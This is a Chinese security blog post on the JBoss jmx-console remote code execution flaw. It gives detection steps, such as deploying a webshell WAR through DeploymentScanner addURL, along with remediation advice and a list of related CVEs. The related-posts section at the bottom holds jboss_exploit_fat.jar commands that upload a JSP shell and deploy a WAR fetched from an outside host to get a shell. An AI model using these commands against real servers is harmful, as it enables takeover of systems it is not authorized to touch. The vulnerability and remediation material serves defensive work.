浅谈“Jboss远程代码执行”

最新推荐文章于 2024-06-26 08:00:00 发布
最新推荐文章于 2024-06-26 08:00:00 发布
阅读量1.1k 收藏
点赞数
分类专栏: Web安全之命令执行类
原文链接:www.yuanwenzanzhaobudao.com
版权

一:漏洞名称:

Jboss远程代码执行, Jboss远程命令执行

描述:

JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间,中的addURL()函数,该函数可以远程下载一个war压缩包并解压。 如果压缩包里含有webshell文件,是直接可以解析的。

检测条件:

被测网站采用了JBOSS中间件架构

检测方法:

  1. 对于采用JBOSS的网站,首先判断其版本,如果版本为1.0.x版本,则可通过对其控制台的访问来判断,访问http://127.0.0.1:8080/jmx-console/,出现以下页面,则此漏洞可被利用:

下拉找到如下图所示

 

 

点击flavor=URL,type=DeploymentScanner进入

在输入框中写入war压缩文件webshell的url地址,如上图

点击invoke执行界面获得一个jsp的webshell,如下图

2.或者用工具jboss_exploit_fat.jar进行远程命令执行来判断是否存在漏洞,如图所示:

 

漏洞修复:

给jmx-console加上访问密码并且执行以下修复方式:

1.在 ${jboss.server.home.dir}/deploy下面找到jmx-console.war目录编辑WEB-INF/web.xml文件 去掉 security-constraint 块的注释,使其起作用。

2.编辑以下文件:

编辑

WEB-INF/classes/jmx-console-users.properties

server/default/conf/props/jmx-console-users.properties (version >=4.0.2)和

WEB-INF/classes/jmx-console-roles.properties

或server/default/conf/props/jmx-console-roles.properties(version >=4.0.2) 添加用户名密码

3.编辑WEB-INF/jboss-web.xml去掉 security-domain 块的注释 ,security-domain值的映射文件为 login-config.xml (该文件定义了登录授权方式)。

4.对于invoker,采用以下方案:

升级相关的JBOSS中间件到最新版本,或者对该删除 $JBOSS_HOME/[server]/all/deploy 和$JBOSS_HOME/[server]/default/deploy下的Jmx-console.war 、Web-console.war这两个.War文件来禁止对Jmx-console和Web-console的访问。

实际案例:

(缺失,资料不全)

问题出现在$JBOSS_HOME/[server]/default/deploy下的Http-invoker.sar/invoker.war包上,通过删除该.war文件已经修复该问题

其他补充说明:

可参考这篇文章浅谈“异常信息泄露(应用程序错误)”来了解JBoss

以下包含有jboos远程命令执行漏洞:(参考:https://www.onebug.org/websafe/75730.html

访问控制不严导致的漏洞

  • JMX Console未授权访问Getshell
  • JMX Console HtmlAdaptor Getshell(CVE-2007-1036)
  • JMX控制台安全验证绕过漏洞(CVE-2010-0738)
  • Administration Console 弱⼝令 Getshell

反序列化漏洞

  • JBoss JMXInvokerServlet 反序列化漏洞 (CVE-2015-7501)
  • JBoss EJBInvokerServlet 反序列化漏洞
  • JBosS AS 6.X 反序列化漏洞 (CVE-2017-12149)
  • JBoss 4.x JBossMQ JMS 反序列化漏洞 (CVE-2017-7504)
红烧兔纸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现nuclei——CVE-2017-12149(JBOSS反序列化远程代码执行漏洞)
记录并分享学习安全的知识点..
01-26 1223
一、漏洞介绍 JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。 影响版本:JBoss 5.x / 6.x 访问:​http://x.x.x.x/invoker/readonly​ 可以看到是返回 500,一般漏洞就是存在了。 二、nuclei扫描结果 三、漏洞复现 (一)通过JavaD.
JBOSS远程代码执行漏洞
Java web 开发专栏
01-09 842
JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图下拉找到如下图所示点击flavor=URL,type=DeploymentScanner进入在输入框中写入war压缩
JBOSS远程代码执行
swordheart的博客
03-29 760
0x00漏洞介绍 JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间,中的addURL()函数,该函数可以远程下载一个war压缩包并解压。如果压缩包里含有webshell文件,是直接可以解析的。 0x01 漏洞复现 http://192.200.30.43:8081/jmx-console/ 找到业务部署的入口,通过addurl,进行远程war包部署,访问地址:http://192.200.30.43:8081/jmx-console/HtmlAdaptor?
(五)vulhub专栏:Jboss远程代码执行漏洞复现
云舒的博客
07-13 584
Jboss远程代码执行 CVE-2017-12149 CVE-2017-7504
Jboss多个远程命令执行漏洞(CVE-2017-12149、CVE-2015-7501、CVE-2017-7504)
最新发布
qq_68163788的博客
06-26 1052
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
JBoss远程代码调试配置说明
07-03
JBoss远程代码调试配置说明 在软件开发过程中, Debug 调试是非常重要的一步,对于大型项目尤其如此。远程调试可以让开发者在本地追踪实际代码,从而快速定位问题,提高开发效率。 什么是远程调试? 远程调试是指...
JavaEE源代码 jboss-common
07-09
JavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-...
Apache tomcat远程代码执行验证代码
04-16
远程代码执行(RCE)是一种严重的安全风险,它允许攻击者在目标系统的上下文中运行自定义代码。在Apache Tomcat的上下文中,这可能意味着攻击者可以获取服务器的完全控制,包括读取、修改或删除敏感数据,安装后门,...
JavaEE源代码 jboss-jmx
07-09
JavaEE源代码 jboss-jmxJavaEE源代码 jboss-jmxJavaEE源代码 jboss-jmxJavaEE源代码 jboss-jmxJavaEE源代码 jboss-jmxJavaEE源代码 jboss-jmxJavaEE源代码 jboss-jmxJavaEE源代码 jboss-jmxJavaEE源代码 jboss-...
JavaEE源代码 jboss-cache
07-09
JavaEE源代码 jboss-cacheJavaEE源代码 jboss-cacheJavaEE源代码 jboss-cacheJavaEE源代码 jboss-cacheJavaEE源代码 jboss-cacheJavaEE源代码 jboss-cacheJavaEE源代码 jboss-cacheJavaEE源代码 jboss-cacheJavaEE源...
jboss_exploit_fat
09-06
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
jboss xml漏洞exp
07-31
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -ja
jboss-system.jar
11-27
jboss-system.jar jboss-system.jar
Eclipse工程Http Invoker Service & Client
11-23
Eclipse工程Http Invoker Service & Client
Jboss反序列化远程代码执行漏洞(CVE-2017-12149)
weixin_46411728的博客
08-28 1714
Jboss反序列化远程代码执行漏洞(CVE-2017-12149)
(CVE-2017-12149) JBOSS Application Server反序列化命令执行
weixin_45253622的博客
12-14 1822
漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。漏洞危害程度为高危(High)。 影响范围 漏洞影响 5.x 和 6.x 版本的 JBOSSAS;目前评估潜在受影响主机数量超过5000台。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JB
JBOSS Seam框架远程代码执行漏洞
02-29 1257
(转http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html) 本文相当于翻译了这篇文章,也主要是想为自己做个笔记 该漏洞的出现主要是由于Jboss-seamFramework框架开发者在加入EL组件支持时,由于没有处理好传给由EL处理的用户数据,导致这个漏洞的产生,structs的一个版本也出现过这样的问题。 EL
Jboss(CVE-2017-12149)反序列化命令执行漏洞
weixin_51151498的博客
12-11 2201
Jboss(CVE-2017-12149)反序列化命令执行漏洞
漏洞复现系列--JBOSS反序列化命令执行CVE-2017-12149
梦之旅行地
05-08 331
一、漏洞影响范围 漏洞影响5.x和6.x版本的JBOSSAS 二、复现过程 1.1.1.1 公网vps,用来接收反弹的shell 2.2.2.2 被攻击的jboss服务器 1、复现环境用的vulhub,直接docker构建下就可以 cd CVE-2017-12149 docker compose up -d 2、docker构建好以后,启动docker docker start 44a...
JBoss应用服务器架构深度解析
通过逆向工程工具,研究人员能够深入理解这些子系统的源代码,揭示它们的组件结构和依赖关系。 1. JBossEJB容器是JBoss的核心组件之一,负责管理和运行EJBs。EJB容器的概念性架构模型强调其插入式设计,允许动态...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值